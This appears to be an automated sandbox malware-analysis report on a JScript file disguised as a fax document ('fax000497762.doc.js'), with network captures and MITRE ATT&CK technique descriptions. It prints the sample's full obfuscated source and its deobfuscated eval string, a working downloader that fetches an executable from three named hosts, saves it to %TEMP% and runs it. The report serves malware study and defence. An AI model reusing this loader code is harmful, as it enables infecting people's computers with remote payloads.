Jan 3, 2022 11:46:50.379012108 CET	1139	IN	Data Raw: 1b 85 7c 6d 34 61 eb d0 0c ae de ff 16 47 2b 94 0d f7 2e 3c 57 36 b0 43 59 6b 47 88 a1 ac 6d b0 5e 6a a8 ea 09 0b fc 54 b8 52 6d cf d9 8e e4 3d 39 99 74 f1 b5 4d 6a 3d 3b 15 37 b8 34 d0 d7 4f 96 15 19 27 b4 f3 03 d6 79 0c e0 92 27 2a e1 32 32 a5 Data Ascii: \|m4aG+.<W6CYkGm^jTRm=9tMj=;74O'y'*22m=3}J'5Ks]lT:_0Y26F8InG.6_dzUZq4"s5R4=(f'{c83C\|$^J}gHplI[j[/G56#Bq$pN5-N60
Jan 3, 2022 11:46:50.379045963 CET	1140	IN	Data Raw: 11 0d 87 e3 64 a2 70 11 9c e5 bc 93 10 8a 69 15 4a cd 8f a5 08 8e 3c db b4 a4 38 1e c7 b5 ef 29 e7 eb 33 7e e7 93 fa 28 9a e0 f4 99 e7 bc 9e e8 39 73 8f a3 7a 1c 47 7c 6f 09 f2 28 ae d5 da db a3 58 c9 f1 d9 86 5c 76 23 94 90 8b 53 d5 ce 33 66 a2 Data Ascii: dpiJ<8)3~(9szG\|o(X\v#S3fuHpi"S)f.Tr#'eR7as UT[7-6-Y-BE.y]ibW71W)Y+}8u*_=_'j"jS
Jan 3, 2022 11:46:51.217202902 CET	1140	OUT	GET /counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&rnd=3090342 HTTP/1.1 Accept: / Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: kennedy.sitoserver.com Connection: Keep-Alive
Jan 3, 2022 11:46:51.443701029 CET	1141	IN	HTTP/1.1 302 Moved Temporarily Date: Mon, 03 Jan 2022 10:46:51 GMT Server: Apache Location: /404.html Cache-Control: no-cache Keep-Alive: timeout=5, max=73 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
Jan 3, 2022 11:46:51.450217009 CET	1141	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 3, 2022 11:46:51.452420950 CET	1141	OUT	GET /404.html HTTP/1.1 Accept: / Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: kennedy.sitoserver.com Connection: Keep-Alive If-Modified-Since: Tue, 17 Aug 2021 05:51:21 GMT
Jan 3, 2022 11:46:51.603988886 CET	1142	IN	HTTP/1.1 304 Not Modified Date: Mon, 03 Jan 2022 10:46:51 GMT Server: Apache Last-Modified: Tue, 17 Aug 2021 05:51:21 GMT Accept-Ranges: bytes Cache-Control: no-cache Keep-Alive: timeout=5, max=72 Connection: Keep-Alive
Jan 3, 2022 11:46:51.856111050 CET	1142	OUT	GET /counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&rnd=3090343 HTTP/1.1 Accept: / Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: kennedy.sitoserver.com Connection: Keep-Alive
Jan 3, 2022 11:46:52.085560083 CET	1143	IN	HTTP/1.1 302 Moved Temporarily Date: Mon, 03 Jan 2022 10:46:51 GMT Server: Apache Location: /404.html Cache-Control: no-cache Keep-Alive: timeout=5, max=71 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
Jan 3, 2022 11:46:52.092039108 CET	1143	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 3, 2022 11:46:52.112559080 CET	1143	OUT	GET /404.html HTTP/1.1 Accept: / Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: kennedy.sitoserver.com Connection: Keep-Alive If-Modified-Since: Tue, 17 Aug 2021 05:51:21 GMT
Jan 3, 2022 11:46:52.263277054 CET	1144	IN	HTTP/1.1 304 Not Modified Date: Mon, 03 Jan 2022 10:46:52 GMT Server: Apache Last-Modified: Tue, 17 Aug 2021 05:51:21 GMT Accept-Ranges: bytes Cache-Control: no-cache Keep-Alive: timeout=5, max=70 Connection: Keep-Alive

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: wscript.exe PID: 7164 Parent PID: 3352

General

Start time:	11:46:47
Start date:	03/01/2022
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\fax000497762.doc.js"
Imagebase:	0x7ff7bcaf0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

JavaScript Code

Call Graph

Executed
Not Executed

Script:

Code
0	var str = "5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55";
1	function b8() {	b8() ➔ "+Stri"
2	return '+Stri';
3	}
4	;
5	function l0() {	l0() ➔ "r (var "
6	return 'r (var ';
7	}
8	;
9	function e8() {	e8() ➔ "MP%")"
10	return 'MP%")';
11	}
12	;
13	function l1() {	l1() ➔ "nmentS"
14	return 'nmentS';
15	}
16	;
17	function z4() {	z4() ➔ "m aba"
18	return 'm aba';
19	}
20	;
21	function q3() {	q3() ➔ "5"; va"
22	return '5"; va';
23	}
24	;
25	function n4() {	n4() ➔ "B.Str"
26	return 'B.Str';
27	}
28	;
29	function p2() {	p2() ➔ "}; };"
30	return '}; };';
31	}
32	;
33	function c5() {	c5() ➔ "o.send("
34	return 'o.send(';
35	}
36	;
37	function z6() {	z6() ➔ "r) { "
38	return 'r) { ';
39	}
40	;
41	function b9() {	b9() ➔ "com nz"
42	return 'com nz';
43	}
44	;
45	function s3() {	s3() ➔ "".exe""
46	return '".exe"';
47	}
48	;
49	function a0() {	a0() ➔ ".size >"
50	return '.size >';
51	}
52	;
53	function i6() {	i6() ➔ "T","ht"
54	return 'T","ht';
55	}
56	;
57	function q1() {	q1() ➔ "(xo.st"
58	return '(xo.st';
59	}
60	;
61	function m3() {	m3() ➔ "= "ken"
62	return '= "ken';
63	}
64	;
65	function g0() {	g0() ➔ "(xo.re"
66	return '(xo.re';
67	}
68	;
69	function i4() {	i4() ➔ "nter/?"
70	return 'nter/?';
71	}
72	;
73	function r4() {	r4() ➔ " }; };"
74	return ' }; };';
75	}
76	;
77	function j5() {	j5() ➔ "+) { "
78	return '+) { ';
79	}
80	;
81	function d6() {	d6() ➔ ",1,0);"
82	return ',1,0);';
83	}
84	;
85	function x7() {	x7() ➔ ".saveTo"
86	return '.saveTo';
87	}
88	;
89	function x0() {	x0() ➔ " 1000)"
90	return ' 1000)';
91	}
92	;
93	function g9() {	g9() ➔ "79975"
94	return '79975';
95	}
96	;
97	function m0() {	m0() ➔ "i=ld; i"
98	return 'i=ld; i';
99	}
100	;
101	function b0() {	b0() ➔ "teObj"
102	return 'teObj';
103	}
104	;
105	function c3() {	c3() ➔ "teObje"
106	return 'teObje';
107	}
108	;
109	function x5() {	x5() ➔ "tch ("
110	return 'tch (';
111	}
112	;
113	function e1() {	e1() ➔ "t.Crea"
114	return 't.Crea';
115	}
116	;
117	function l6() {	l6() ➔ "fn+n+"."
118	return 'fn+n+".';
119	}
120	;
121	function g8() {	g8() ➔ "nedy."
122	return 'nedy.';
123	}
124	;
125	function b3() {	b3() ➔ "; try "
126	return '; try ';
127	}
128	;
129	function d0() {	d0() ➔ "92)+""
130	return '92)+"';
131	}
132	;
133	function k7() {	k7() ➔ "rCode("
134	return 'rCode(';
135	}
136	;
137	function u8() {	u8() ➔ " (var "
138	return ' (var ';
139	}
140	;
141	function t4() {	t4() ➔ "}; if"
142	return '}; if';
143	}
144	;
145	function v6() {	v6() ➔ "n=1; n"
146	return 'n=1; n';
147	}
148	;
149	function f0() {	f0() ➔ "<b.len"
150	return '<b.len';
151	}
152	;
153	function a3() {	a3() ➔ "= 200)"
154	return '= 200)';
155	}
156	;
157	function j6() {	j6() ➔ "".spl"
158	return '".spl';
159	}
160	;
161	function s9() {	s9() ➔ "r xo ="
162	return 'r xo =';
163	}
164	;
165	function e0() {	e0() ➔ "Shell"
166	return 'Shell';
167	}
168	;
169	function l5() {	l5() ➔ "eak; }"
170	return 'eak; }';
171	}
172	;
173	function z3() {	z3() ➔ "{ ws.Ru"
174	return '{ ws.Ru';
175	}
176	;
177	function c0() {	c0() ➔ "<=3; n+"
178	return '<=3; n+';
179	}
180	;
181	function a1() {	a1() ➔ "Object("
182	return 'Object(';
183	}
184	;
185	function j9() {	j9() ➔ " if (xa"
186	return ' if (xa';
187	}
188	;
189	function o9() {	o9() ➔ "e); x"
190	return 'e); x';
191	}
192	;
193	function h3() {	h3() ➔ " = 1; x"
194	return ' = 1; x';
195	}
196	;
197	function n3() {	n3() ➔ " } ca"
198	return ' } ca';
199	}
200	;
201	function f9() {	f9() ➔ "ng.fr"
202	return 'ng.fr';
203	}
204	;
205	function k6() {	k6() ➔ "n(fn+n+"
206	return 'n(fn+n+';
207	}
208	;
209	function f6() {	f6() ➔ " = ws.E"
210	return ' = ws.E';
211	}
212	;
213	function z8() {	z8() ➔ " i; br"
214	return ' i; br';
215	}
216	;
217	function h8() {	h8() ➔ "34"+n"
218	return '34"+n';
219	}
220	;
221	function n0() {	n0() ➔ ".Crea"
222	return '.Crea';
223	}
224	;
225	function k4() {	k4() ➔ "Enviro"
226	return 'Enviro';
227	}
228	;
229	function p5() {	p5() ➔ "write"
230	return 'write';
231	}
232	;
233	function u5() {	u5() ➔ "ld = 0"
234	return 'ld = 0';
235	}
236	;
237	function j0() {	j0() ➔ "spons"
238	return 'spons';
239	}
240	;
241	function f8() {	f8() ➔ "("%TE"
242	return '("%TE';
243	}
244	;
245	function i8() {	i8() ➔ "; } ca"
246	return '; } ca';
247	}
248	;
249	function t6() {	t6() ➔ "ript."
250	return 'ript.';
251	}
252	;
253	function h2() {	h2() ➔ " ws = "
254	return ' ws = ';
255	}
256	;
257	function t0() {	t0() ➔ "xpand"
258	return 'xpand';
259	}
260	;
261	function d8() {	d8() ➔ "File("
262	return 'File(';
263	}
264	;
265	function b6() {	b6() ➔ "trings"
266	return 'trings';
267	}
268	;
269	function s2() {	s2() ➔ ""); v"
270	return '"); v';
271	}
272	;
273	function d3() {	d3() ➔ ""); va"
274	return '"); va';
275	}
276	;
277	function l8() {	l8() ➔ "open();"
278	return 'open();';
279	}
280	;
281	function f2() {	f2() ➔ ", fals"
282	return ', fals';
283	}
284	;
285	function s7() {	s7() ➔ "gth; i+"
286	return 'gth; i+';
287	}
288	;
289	function d7() {	d7() ➔ "ct("WS"
290	return 'ct("WS';
291	}
292	;
293	function o1() {	o1() ➔ "sitose"
294	return 'sitose';
295	}
296	;
297	function o4() {	o4() ➔ " xo.ope"
298	return ' xo.ope';
299	}
300	;
301	function i7() {	i7() ➔ "+) { fo"
302	return '+) { fo';
303	}
304	;
305	function w1() {	w1() ➔ ""/cou"
306	return '"/cou';
307	}
308	;
309	var u7 = '';
310	function p3() {	p3() ➔ "var d"
311	return 'var d';
312	}
313	;
314	function i1() {	i1() ➔ "eBody);"
315	return 'eBody);';
316	}
317	;
318	function h9() {	h9() ➔ "try {"
319	return 'try {';
320	}
321	;
322	function h0() {	h0() ➔ "; var "
323	return '; var ';
324	}
325	;
326	function k1() {	k1() ➔ "1; xa."
327	return '1; xa.';
328	}
329	;
330	function c4() {	c4() ➔ "it(" "
331	return 'it(" ';
332	}
333	;
334	function k2() {	k2() ➔ "r xa "
335	return 'r xa ';
336	}
337	;
338	function e2() {	e2() ➔ "ion = "
339	return 'ion = ';
340	}
341	;
342	function n2() {	n2() ➔ "omCha"
343	return 'omCha';
344	}
345	;
346	function e7() {	e7() ➔ "= WSc"
347	return '= WSc';
348	}
349	;
350	function a2() {	a2() ➔ " (dn "
351	return ' (dn ';
352	}
353	;
354	function r2() {	r2() ➔ "se(); "
355	return 'se(); ';
356	}
357	;
358	function u2() {	u2() ➔ "WScript"
359	return 'WScript';
360	}
361	;
362	function p8() {	p8() ➔ "ar fn"
363	return 'ar fn';
364	}
365	;
366	function p6() {	p6() ➔ " { ld ="
367	return ' { ld =';
368	}
369	;
370	function k0() {	k0() ➔ "; for"
371	return '; for';
372	}
373	;
374	function d2() {	d2() ➔ "d=3090"
375	return 'd=3090';
376	}
377	;
378	function n8() {	n8() ➔ "rver."
379	return 'rver.';
380	}
381	;
382	function a9() {	a9() ➔ ""ADOD"
383	return '"ADOD';
384	}
385	;
386	function q5() {	q5() ➔ "+b[i]+"
387	return '+b[i]+';
388	}
389	;
390	function u1() {	u1() ➔ " WScrip"
391	return ' WScrip';
392	}
393	;
394	function y9() {	y9() ➔ "id="+s"
395	return 'id="+s';
396	}
397	;
398	function g2() {	g2() ➔ " };"
399	return ' };';
400	}
401	;
402	function x4() {	x4() ➔ "er) {"
403	return 'er) {';
404	}
405	;
406	function j3() {	j3() ➔ "a.posit"
407	return 'a.posit';
408	}
409	;
410	function p0() {	p0() ➔ "Create"
411	return 'Create';
412	}
413	;
414	function l2() {	l2() ➔ "ma.org"
415	return 'ma.org';
416	}
417	;
418	function z2() {	z2() ➔ "vince"
419	return 'vince';
420	}
421	;
422	function m4() {	m4() ➔ " xa.clo"
423	return ' xa.clo';
424	}
425	;
426	function r7() {	r7() ➔ "exe",2)"
427	return 'exe",2)';
428	}
429	;
430	function m8() {	m8() ➔ "== 1)"
431	return '== 1)';
432	}
433	;
434	function l4() {	l4() ➔ "cript."
435	return 'cript.';
436	}
437	;
438	function g1() {	g1() ➔ " { xa."
439	return ' { xa.';
440	}
441	;
442	function t7() {	t7() ➔ "tr+"&rn"
443	return 'tr+"&rn';
444	}
445	;
446	function b4() {	b4() ➔ ""); var"
447	return '"); var';
448	}
449	;
450	function j4() {	j4() ➔ "XMLHTTP"
451	return 'XMLHTTP';
452	}
453	;
454	function b1() {	b1() ➔ "ype = "
455	return 'ype = ';
456	}
457	;
458	function w0() {	w0() ➔ function eval()
459	return eval;
460	}
461	;
462	function l7() {	l7() ➔ "0; xa"
463	return '0; xa';
464	}
465	;
466	function f5() {	f5() ➔ "n("GE"
467	return 'n("GE';
468	}
469	;
470	function a8() {	a8() ➔ "ect(""
471	return 'ect("';
472	}
473	;
474	function o0() {	o0() ➔ "); if "
475	return '); if ';
476	}
477	;
478	function t1() {	t1() ➔ "var b "
479	return 'var b ';
480	}
481	;
482	function u3() {	u3() ➔ "tp://""
483	return 'tp://"';
484	}
485	;
486	function y0() {	y0() ➔ "eam")"
487	return 'eam")';
488	}
489	;
490	function y8() {	y8() ➔ " xa.t"
491	return ' xa.t';
492	}
493	;
494	function r9() {	r9() ➔ "tch (e"
495	return 'tch (e';
496	}
497	;
498	function w8() {	w8() ➔ "nt.co"
499	return 'nt.co';
500	}
501	;
502	function h6() {	h6() ➔ "atus ="
503	return 'atus =';
504	}
505	;
506	function c6() {	c6() ➔ " { dn"
507	return ' { dn';
508	}
509	;
510	function t8() {	t8() ➔ "MSXML2."
511	return 'MSXML2.';
512	}
513	;
514	function f4() {	f4() ➔ "n = 0; "
515	return 'n = 0; ';
516	}
517	;
518	u7 += t1 ( );	t1() ➔ "var b "
519	u7 += m3 ( );	m3() ➔ "= "ken"
520	u7 += g8 ( );	g8() ➔ "nedy."
521	u7 += o1 ( );	o1() ➔ "sitose"
522	u7 += n8 ( );	n8() ➔ "rver."
523	u7 += b9 ( );	b9() ➔ "com nz"
524	u7 += z2 ( );	z2() ➔ "vince"
525	u7 += w8 ( );	w8() ➔ "nt.co"
526	u7 += z4 ( );	z4() ➔ "m aba"
527	u7 += l2 ( );	l2() ➔ "ma.org"
528	u7 += j6 ( );	j6() ➔ "".spl"
529	u7 += c4 ( );	c4() ➔ "it(" "
530	u7 += b4 ( );	b4() ➔ ""); var"
531	u7 += h2 ( );	h2() ➔ " ws = "
532	u7 += u2 ( );	u2() ➔ "WScript"
533	u7 += n0 ( );	n0() ➔ ".Crea"
534	u7 += c3 ( );	c3() ➔ "teObje"
535	u7 += d7 ( );	d7() ➔ "ct("WS"
536	u7 += l4 ( );	l4() ➔ "cript."
537	u7 += e0 ( );	e0() ➔ "Shell"
538	u7 += s2 ( );	s2() ➔ ""); v"
539	u7 += p8 ( );	p8() ➔ "ar fn"
540	u7 += f6 ( );	f6() ➔ " = ws.E"
541	u7 += t0 ( );	t0() ➔ "xpand"
542	u7 += k4 ( );	k4() ➔ "Enviro"
543	u7 += l1 ( );	l1() ➔ "nmentS"
544	u7 += b6 ( );	b6() ➔ "trings"
545	u7 += f8 ( );	f8() ➔ "("%TE"
546	u7 += e8 ( );	e8() ➔ "MP%")"
547	u7 += b8 ( );	b8() ➔ "+Stri"
548	u7 += f9 ( );	f9() ➔ "ng.fr"
549	u7 += n2 ( );	n2() ➔ "omCha"
550	u7 += k7 ( );	k7() ➔ "rCode("
551	u7 += d0 ( );	d0() ➔ "92)+""
552	u7 += g9 ( );	g9() ➔ "79975"
553	u7 += q3 ( );	q3() ➔ "5"; va"
554	u7 += s9 ( );	s9() ➔ "r xo ="
555	u7 += u1 ( );	u1() ➔ " WScrip"
556	u7 += e1 ( );	e1() ➔ "t.Crea"
557	u7 += b0 ( );	b0() ➔ "teObj"
558	u7 += a8 ( );	a8() ➔ "ect(""
559	u7 += t8 ( );	t8() ➔ "MSXML2."
560	u7 += j4 ( );	j4() ➔ "XMLHTTP"
561	u7 += d3 ( );	d3() ➔ ""); va"
562	u7 += k2 ( );	k2() ➔ "r xa "
563	u7 += e7 ( );	e7() ➔ "= WSc"
564	u7 += t6 ( );	t6() ➔ "ript."
565	u7 += p0 ( );	p0() ➔ "Create"
566	u7 += a1 ( );	a1() ➔ "Object("
567	u7 += a9 ( );	a9() ➔ ""ADOD"
568	u7 += n4 ( );	n4() ➔ "B.Str"
569	u7 += y0 ( );	y0() ➔ "eam")"
570	u7 += h0 ( );	h0() ➔ "; var "
571	u7 += u5 ( );	u5() ➔ "ld = 0"
572	u7 += k0 ( );	k0() ➔ "; for"
573	u7 += u8 ( );	u8() ➔ " (var "
574	u7 += v6 ( );	v6() ➔ "n=1; n"
575	u7 += c0 ( );	c0() ➔ "<=3; n+"
576	u7 += i7 ( );	i7() ➔ "+) { fo"
577	u7 += l0 ( );	l0() ➔ "r (var "
578	u7 += m0 ( );	m0() ➔ "i=ld; i"
579	u7 += f0 ( );	f0() ➔ "<b.len"
580	u7 += s7 ( );	s7() ➔ "gth; i+"
581	u7 += j5 ( );	j5() ➔ "+) { "
582	u7 += p3 ( );	p3() ➔ "var d"
583	u7 += f4 ( );	f4() ➔ "n = 0; "
584	u7 += h9 ( );	h9() ➔ "try {"
585	u7 += o4 ( );	o4() ➔ " xo.ope"
586	u7 += f5 ( );	f5() ➔ "n("GE"
587	u7 += i6 ( );	i6() ➔ "T","ht"
588	u7 += u3 ( );	u3() ➔ "tp://""
589	u7 += q5 ( );	q5() ➔ "+b[i]+"
590	u7 += w1 ( );	w1() ➔ ""/cou"
591	u7 += i4 ( );	i4() ➔ "nter/?"
592	u7 += y9 ( );	y9() ➔ "id="+s"
593	u7 += t7 ( );	t7() ➔ "tr+"&rn"
594	u7 += d2 ( );	d2() ➔ "d=3090"
595	u7 += h8 ( );	h8() ➔ "34"+n"
596	u7 += f2 ( );	f2() ➔ ", fals"
597	u7 += o9 ( );	o9() ➔ "e); x"
598	u7 += c5 ( );	c5() ➔ "o.send("
599	u7 += o0 ( );	o0() ➔ "); if "
600	u7 += q1 ( );	q1() ➔ "(xo.st"
601	u7 += h6 ( );	h6() ➔ "atus ="
602	u7 += a3 ( );	a3() ➔ "= 200)"
603	u7 += g1 ( );	g1() ➔ " { xa."
604	u7 += l8 ( );	l8() ➔ "open();"
605	u7 += y8 ( );	y8() ➔ " xa.t"
606	u7 += b1 ( );	b1() ➔ "ype = "
607	u7 += k1 ( );	k1() ➔ "1; xa."
608	u7 += p5 ( );	p5() ➔ "write"
609	u7 += g0 ( );	g0() ➔ "(xo.re"
610	u7 += j0 ( );	j0() ➔ "spons"
611	u7 += i1 ( );	i1() ➔ "eBody);"
612	u7 += j9 ( );	j9() ➔ " if (xa"
613	u7 += a0 ( );	a0() ➔ ".size >"
614	u7 += x0 ( );	x0() ➔ " 1000)"
615	u7 += c6 ( );	c6() ➔ " { dn"
616	u7 += h3 ( );	h3() ➔ " = 1; x"
617	u7 += j3 ( );	j3() ➔ "a.posit"
618	u7 += e2 ( );	e2() ➔ "ion = "
619	u7 += l7 ( );	l7() ➔ "0; xa"
620	u7 += x7 ( );	x7() ➔ ".saveTo"
621	u7 += d8 ( );	d8() ➔ "File("
622	u7 += l6 ( );	l6() ➔ "fn+n+"."
623	u7 += r7 ( );	r7() ➔ "exe",2)"
624	u7 += b3 ( );	b3() ➔ "; try "
625	u7 += z3 ( );	z3() ➔ "{ ws.Ru"
626	u7 += k6 ( );	k6() ➔ "n(fn+n+"
627	u7 += s3 ( );	s3() ➔ "".exe""
628	u7 += d6 ( );	d6() ➔ ",1,0);"
629	u7 += n3 ( );	n3() ➔ " } ca"
630	u7 += x5 ( );	x5() ➔ "tch ("
631	u7 += x4 ( );	x4() ➔ "er) {"
632	u7 += r4 ( );	r4() ➔ " }; };"
633	u7 += m4 ( );	m4() ➔ " xa.clo"
634	u7 += r2 ( );	r2() ➔ "se(); "
635	u7 += t4 ( );	t4() ➔ "}; if"
636	u7 += a2 ( );	a2() ➔ " (dn "
637	u7 += m8 ( );	m8() ➔ "== 1)"
638	u7 += p6 ( );	p6() ➔ " { ld ="
639	u7 += z8 ( );	z8() ➔ " i; br"
640	u7 += l5 ( );	l5() ➔ "eak; }"
641	u7 += i8 ( );	i8() ➔ "; } ca"
642	u7 += r9 ( );	r9() ➔ "tch (e"
643	u7 += z6 ( );	z6() ➔ "r) { "
644	u7 += p2 ( );	p2() ➔ "}; };"
645	u7 += g2 ( );	g2() ➔ " };"
646	w0 ( ) ( u7 );	w0() ➔ function eval() ("var b = "kennedy.sitoserver.com nzvincent.com abama.org".split(" "); var ws = WScript.CreateObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"799755"; var xo = WScript.CreateObject("MSXML2.XMLHTTP"); var xa = WScript.CreateObject("ADODB.Stream"); var ld = 0; for (var n=1; n<=3; n++) { for (var i=ld; i<b.length; i++) { var dn = 0; try { xo.open("GET","http://"+b[i]+"/counter/?id="+str+"&rnd=309034"+n, false); xo.send(); if (xo.status == 200) { xa.open(); xa.type = 1; xa.write(xo.responseBody); if (xa.size > 1000) { dn = 1; xa.position = 0; xa.saveToFile(fn+n+".exe",2); try { ws.Run(fn+n+".exe",1,0); } catch (er) { }; }; xa.close(); }; if (dn == 1) { ld = i; break; }; } catch (er) { }; }; };") ➔ 0

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report fax000497762.doc.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

Jbx Signature Overview

AV Detection:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: wscript.exe PID: 7164 Parent PID: 3352

General

Chronological Activities

Disassembly

Code Analysis

JavaScript Code

Call Graph

Graph